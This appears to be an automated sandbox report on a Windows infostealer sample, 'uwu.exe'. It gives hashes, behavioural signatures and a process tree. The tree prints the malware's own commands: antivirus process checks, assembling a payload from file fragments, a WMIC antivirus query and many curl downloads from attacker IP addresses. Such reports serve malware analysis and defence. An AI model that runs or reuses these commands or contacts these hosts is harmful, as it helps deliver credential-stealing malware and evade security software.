Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/11/2024, 16:39
Static task
static1
Behavioral task
behavioral1
Sample
uwu.exe
Resource
win7-20240708-en
General
-
Target
uwu.exe
-
Size
1.0MB
-
MD5
fc877cda1618318751789044fb01a6bd
-
SHA1
15f90c8f5c543964a33d62d6e68f62a6d2712262
-
SHA256
ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
-
SHA512
b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
-
SSDEEP
24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1208 created 3536 1208 Crossword.pif 56 -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Either.pif Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation uwu.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Crossword.pif Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation RevenueDevices.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url cmd.exe -
Executes dropped EXE 6 IoCs
pid Process 1208 Crossword.pif 4528 azvw.exe 4872 RevenueDevices.exe 2412 Either.pif 3864 azvw.exe 4312 7za.exe -
Loads dropped DLL 1 IoCs
pid Process 2412 Either.pif -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 968 tasklist.exe 4204 tasklist.exe 2824 tasklist.exe 436 tasklist.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\BrushSub RevenueDevices.exe File opened for modification C:\Windows\McLol RevenueDevices.exe File opened for modification C:\Windows\SoilOasis uwu.exe File opened for modification C:\Windows\RebatesPalm uwu.exe File opened for modification C:\Windows\DouglasWind uwu.exe File opened for modification C:\Windows\TmpMoon RevenueDevices.exe File opened for modification C:\Windows\NotifiedAaron RevenueDevices.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language azvw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Either.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crossword.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2372 cmd.exe 2072 Robocopy.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 460 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1208 Crossword.pif -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2824 tasklist.exe Token: SeDebugPrivilege 436 tasklist.exe Token: SeIncreaseQuotaPrivilege 4320 WMIC.exe Token: SeSecurityPrivilege 4320 WMIC.exe Token: SeTakeOwnershipPrivilege 4320 WMIC.exe Token: SeLoadDriverPrivilege 4320 WMIC.exe Token: SeSystemProfilePrivilege 4320 WMIC.exe Token: SeSystemtimePrivilege 4320 WMIC.exe Token: SeProfSingleProcessPrivilege 4320 WMIC.exe Token: SeIncBasePriorityPrivilege 4320 WMIC.exe Token: SeCreatePagefilePrivilege 4320 WMIC.exe Token: SeBackupPrivilege 4320 WMIC.exe Token: SeRestorePrivilege 4320 WMIC.exe Token: SeShutdownPrivilege 4320 WMIC.exe Token: SeDebugPrivilege 4320 WMIC.exe Token: SeSystemEnvironmentPrivilege 4320 WMIC.exe Token: SeRemoteShutdownPrivilege 4320 WMIC.exe Token: SeUndockPrivilege 4320 WMIC.exe Token: SeManageVolumePrivilege 4320 WMIC.exe Token: 33 4320 WMIC.exe Token: 34 4320 WMIC.exe Token: 35 4320 WMIC.exe Token: 36 4320 WMIC.exe Token: SeIncreaseQuotaPrivilege 4320 WMIC.exe Token: SeSecurityPrivilege 4320 WMIC.exe Token: SeTakeOwnershipPrivilege 4320 WMIC.exe Token: SeLoadDriverPrivilege 4320 WMIC.exe Token: SeSystemProfilePrivilege 4320 WMIC.exe Token: SeSystemtimePrivilege 4320 WMIC.exe Token: SeProfSingleProcessPrivilege 4320 WMIC.exe Token: SeIncBasePriorityPrivilege 4320 WMIC.exe Token: SeCreatePagefilePrivilege 4320 WMIC.exe Token: SeBackupPrivilege 4320 WMIC.exe Token: SeRestorePrivilege 4320 WMIC.exe Token: SeShutdownPrivilege 4320 WMIC.exe Token: SeDebugPrivilege 4320 WMIC.exe Token: SeSystemEnvironmentPrivilege 4320 WMIC.exe Token: SeRemoteShutdownPrivilege 4320 WMIC.exe Token: SeUndockPrivilege 4320 WMIC.exe Token: SeManageVolumePrivilege 4320 WMIC.exe Token: 33 4320 WMIC.exe Token: 34 4320 WMIC.exe Token: 35 4320 WMIC.exe Token: 36 4320 WMIC.exe Token: 33 1208 Crossword.pif Token: SeIncBasePriorityPrivilege 1208 Crossword.pif Token: SeDebugPrivilege 968 tasklist.exe Token: SeDebugPrivilege 4204 tasklist.exe Token: 33 1208 Crossword.pif Token: SeIncBasePriorityPrivilege 1208 Crossword.pif Token: 33 1208 Crossword.pif Token: SeIncBasePriorityPrivilege 1208 Crossword.pif Token: 33 1208 Crossword.pif Token: SeIncBasePriorityPrivilege 1208 Crossword.pif Token: SeBackupPrivilege 2072 Robocopy.exe Token: SeRestorePrivilege 2072 Robocopy.exe Token: SeSecurityPrivilege 2072 Robocopy.exe Token: SeTakeOwnershipPrivilege 2072 Robocopy.exe Token: SeRestorePrivilege 4312 7za.exe Token: 35 4312 7za.exe Token: SeSecurityPrivilege 4312 7za.exe Token: SeSecurityPrivilege 4312 7za.exe Token: 33 1208 Crossword.pif Token: SeIncBasePriorityPrivilege 1208 Crossword.pif -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 2412 Either.pif 2412 Either.pif 2412 Either.pif -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1208 Crossword.pif 1208 Crossword.pif 1208 Crossword.pif 2412 Either.pif 2412 Either.pif 2412 Either.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2412 Either.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3544 wrote to memory of 1416 3544 uwu.exe 85 PID 3544 wrote to memory of 1416 3544 uwu.exe 85 PID 3544 wrote to memory of 1416 3544 uwu.exe 85 PID 1416 wrote to memory of 2824 1416 cmd.exe 93 PID 1416 wrote to memory of 2824 1416 cmd.exe 93 PID 1416 wrote to memory of 2824 1416 cmd.exe 93 PID 1416 wrote to memory of 2284 1416 cmd.exe 94 PID 1416 wrote to memory of 2284 1416 cmd.exe 94 PID 1416 wrote to memory of 2284 1416 cmd.exe 94 PID 1416 wrote to memory of 436 1416 cmd.exe 95 PID 1416 wrote to memory of 436 1416 cmd.exe 95 PID 1416 wrote to memory of 436 1416 cmd.exe 95 PID 1416 wrote to memory of 2272 1416 cmd.exe 96 PID 1416 wrote to memory of 2272 1416 cmd.exe 96 PID 1416 wrote to memory of 2272 1416 cmd.exe 96 PID 1416 wrote to memory of 372 1416 cmd.exe 97 PID 1416 wrote to memory of 372 1416 cmd.exe 97 PID 1416 wrote to memory of 372 1416 cmd.exe 97 PID 1416 wrote to memory of 3700 1416 cmd.exe 98 PID 1416 wrote to memory of 3700 1416 cmd.exe 98 PID 1416 wrote to memory of 3700 1416 cmd.exe 98 PID 1416 wrote to memory of 1180 1416 cmd.exe 99 PID 1416 wrote to memory of 1180 1416 cmd.exe 99 PID 1416 wrote to memory of 1180 1416 cmd.exe 99 PID 1416 wrote to memory of 1208 1416 cmd.exe 100 PID 1416 wrote to memory of 1208 1416 cmd.exe 100 PID 1416 wrote to memory of 1208 1416 cmd.exe 100 PID 1416 wrote to memory of 2516 1416 cmd.exe 101 PID 1416 wrote to memory of 2516 1416 cmd.exe 101 PID 1416 wrote to memory of 2516 1416 cmd.exe 101 PID 1208 wrote to memory of 1756 1208 Crossword.pif 102 PID 1208 wrote to memory of 1756 1208 Crossword.pif 102 PID 1208 wrote to memory of 1756 1208 Crossword.pif 102 PID 1208 wrote to memory of 1720 1208 Crossword.pif 107 PID 1208 wrote to memory of 1720 1208 Crossword.pif 107 PID 1208 wrote to memory of 1720 1208 Crossword.pif 107 PID 1720 wrote to memory of 4320 1720 cmd.exe 109 PID 1720 wrote to memory of 4320 1720 cmd.exe 109 PID 1720 wrote to memory of 4320 1720 cmd.exe 109 PID 1208 wrote to memory of 3040 1208 Crossword.pif 111 PID 1208 wrote to memory of 3040 1208 Crossword.pif 111 PID 1208 wrote to memory of 3040 1208 Crossword.pif 111 PID 1208 wrote to memory of 2824 1208 Crossword.pif 113 PID 1208 wrote to memory of 2824 1208 Crossword.pif 113 PID 1208 wrote to memory of 2824 1208 Crossword.pif 113 PID 2824 wrote to memory of 2272 2824 cmd.exe 115 PID 2824 wrote to memory of 2272 2824 cmd.exe 115 PID 2824 wrote to memory of 2272 2824 cmd.exe 115 PID 1208 wrote to memory of 5012 1208 Crossword.pif 117 PID 1208 wrote to memory of 5012 1208 Crossword.pif 117 PID 1208 wrote to memory of 5012 1208 Crossword.pif 117 PID 5012 wrote to memory of 2024 5012 cmd.exe 119 PID 5012 wrote to memory of 2024 5012 cmd.exe 119 PID 5012 wrote to memory of 2024 5012 cmd.exe 119 PID 1208 wrote to memory of 1460 1208 Crossword.pif 120 PID 1208 wrote to memory of 1460 1208 Crossword.pif 120 PID 1208 wrote to memory of 1460 1208 Crossword.pif 120 PID 1460 wrote to memory of 4932 1460 cmd.exe 122 PID 1460 wrote to memory of 4932 1460 cmd.exe 122 PID 1460 wrote to memory of 4932 1460 cmd.exe 122 PID 1208 wrote to memory of 3432 1208 Crossword.pif 123 PID 1208 wrote to memory of 3432 1208 Crossword.pif 123 PID 1208 wrote to memory of 3432 1208 Crossword.pif 123 PID 3432 wrote to memory of 1400 3432 cmd.exe 125
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\uwu.exe"C:\Users\Admin\AppData\Local\Temp\uwu.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"4⤵PID:2284
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"4⤵
- System Location Discovery: System Language Discovery
PID:2272
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2264434⤵
- System Location Discovery: System Language Discovery
PID:372
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "AthleticsTabletsUserImaging" Slovenia4⤵PID:3700
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d4⤵
- System Location Discovery: System Language Discovery
PID:1180
-
-
C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pifCrossword.pif d4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\699 2>&15⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\699 > C:\Users\Admin\AppData\Local\temp\4575⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"6⤵PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"6⤵PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:4712
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"5⤵PID:3248
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"6⤵PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:2564
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"5⤵
- System Location Discovery: System Language Discovery
PID:4036 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"6⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip5⤵
- System Location Discovery: System Language Discovery
PID:3444 -
C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exeazvw.exe -o xhwq.zip6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:4216
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"5⤵
- System Location Discovery: System Language Discovery
PID:4428 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"6⤵PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&15⤵
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:460
-
-
C:\Windows\SysWOW64\findstr.exefindstr /C:"OS Name"6⤵PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:4052 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:3296 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"5⤵PID:436
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"6⤵PID:1280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:4372
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:4160
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"5⤵
- System Location Discovery: System Language Discovery
PID:3436 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"6⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:5024 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:4280
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:1708
-
-
-
